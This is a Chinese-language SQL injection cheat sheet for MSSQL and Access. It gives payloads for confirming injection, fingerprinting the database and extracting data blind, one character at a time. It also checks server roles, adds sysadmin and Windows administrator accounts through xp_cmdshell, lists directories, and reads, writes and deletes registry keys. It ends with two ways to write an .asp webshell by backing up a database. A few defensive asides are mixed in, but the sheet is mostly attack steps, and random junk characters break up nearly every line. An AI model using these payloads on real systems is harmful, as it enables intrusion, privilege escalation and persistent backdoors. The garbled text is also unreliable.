1.判断是否有注入;and 1=1 ;and 1=2(两个请求的响应不同,说明参数被直接拼接进了SQL语句;改用参数化查询后不会出现这种差别)
2.初步判断是否是mssql ;and user>0 tjDCfJx*
w}(Ht_6q{
3.注入参数是字符'and [查询条件] and ''=' }~NWOJ3;
{0} Q5
4.搜索时没过滤参数的'and [查询条件] and '%25'=' R8u9tTW
B}h8c
5.判断数据库系统 J#k.!]r,Y
S\118TpD
;and (select count(*) from sysobjects)>0 mssql rx(z::
q9m-d-!)
;and (select count(*) from msysobjects)>0 access ]K>x:vMKH
4
eP-yi
u*!/J R
upF^k%<y:
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Dj{t[z]$k
A|0\ct
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Ha!]*wg#
X;p4/ *U
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 8:Jc2K
nc>Ae`"(
9.(1)猜字段的ascii值(access) 6[C>"s}Ol
@{^6_n+gT%
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 E1rxuV|9
.l]w4Hf
(2)猜字段的ascii值(mssql) G2_l}q~
(L8z<id<z
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 O(44Dy@2
JclG*/Wjg4
10.测试权限结构(mssql)(第11、14、16条的语句需要sysadmin、securityadmin或db_owner一类的高权限;应用连接帐户按最小权限配置时,这些语句会因权限不足而失败)
~]lVixr9
8` f=Eh
P'CDV3+
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- .Vb\f
<<ifd?
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- zE4TdT1y|
vZ2/>}!Z=
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 4>8'.8S
tv7A&Z)Rh
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- iN@+,]Yjl
JlN<w
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- T! fF1cpF\
gJI(d6
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- !T8h+3I
9^1.nE(R&
;and 1=(select IS_MEMBER('db_owner'));-- yBxWBW*e
nQ^<h.
[n;GP@A]R
|R$/oq
11.添加mssql和系统的帐户(xp_cmdshell自SQL Server 2005起默认禁用,应保持禁用;新增登录名和服务器角色成员变更应纳入审计)
Wfyap)y
;exec master.dbo.sp_addlogin username;-- 6):^m{RH^
;exec master.dbo.sp_password null,username,password;-- q6
Rr?
x*z$4)RP
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 92K#xM/
\A9hYTC)
;exec master.dbo.xp_cmdshell 'net user username password aY@st]p
lip1wR7
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ax+P)yz
h"+|)'*n
;exec master.dbo.xp_cmdshell 'net user username password /add';-- OQm-BL
LTc=D
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- h$y0>eMWs
s+yX82Y
C'jE'B5b
Qh.
:
N
12.(1)遍历目录 a6fqtkZ x
/6@Wm?`DB
;create table dirs(paths varchar(100), id int) H-aSLc
C~aNOe
WR
;insert dirs exec master.dbo.xp_dirtree 'c:\' }
h pTS_
[>tyx{T Ye
;and (select top 1 paths from dirs)>0 D%k]D/
^l"
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) {:r8X
c'r7sI%Yi
atO/Tp
!@[@xdV
(2)遍历目录 v"dj%75O?e
;\Vi~2!8
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Ohmi(s
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 nXuoRZ
27!9LU
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 #=B~}
_
w$5#jJX\
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构
:.
ja~Q
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 <MH| <hP
?YO$NYwE
=8F]cW'1`
SXx2
13.mssql中的存储过程 qc-4;m o
g [~"c}
xp_regenumvalues 注册表根键, 子键 a D,(mw-7r
f}1R,N_fC
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 +u:Q+PkM
pK~K>8\
xp_regread 根键,子键,键值名 |P"p/iY
_,JdL'[d
;exec xp_regread ` E2@GX+,
^SouA[
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值
y-iuOzq4
xp_regwrite 根键,子键, 值名, 值类型, 值 qs]7S^yw
$`&uu
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 C r~!N|(
,!RbFME&H
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 P|OjtI
,^UNQO*{GI
xp_regdeletevalue 根键,子键,值名 `/mcjKQ&9y
iYJzSVO
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 do:3aP'S,
Ws;}D}+
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 J c~{ E
/Af:{|'$%
q!
+?
mqg[2VTRP
14.mssql的backup创建webshell(前提是SQL Server服务帐户对web目录有写权限;备份目标文件为.asp等脚本扩展名是明显的检测特征)
^sNj[%I
R
use model 9)a:8/Y
/k(KA [bS
create table cmd(str image); uZ-yu|1
6-@
X
insert into cmd(str) values (''); Y!6,ty'
9Xg+$/
backup database model to disk='c:\l.asp'; m};Qng]
'o#ve72z1
<XV\8Y+n
d +Vx:`tT
15.mssql内置函数 :{d?B$
$Y!$I.+
;and (select @@version)>0 获得SQL Server的版本字符串(其中包含Windows的版本号)
W7a aL
;and user_name()='dbo' 判断当前连接用户是否映射为dbo(sa会映射为dbo,但数据库所有者和其他sysadmin成员同样如此)
/OpVr15
;and (select user_name())>0 爆当前系统的连接用户 zd+_
BPT
;MqH)M
;and (select db_name())>0 得到当前连接的数据库 ly<1]jK
Q_bF^4gt
,h'q}5
e)[>E\u _
16.简洁的webshell j z aC
V(%L}0[]
use model Z2]ySyt]
`2X#;{a:
create table cmd(str image); lqO"
{o?+T);Z
insert into cmd(str) values (''); HrUQ X4
D|u! KH
backup database model to disk='g:\wwwtest\l.asp';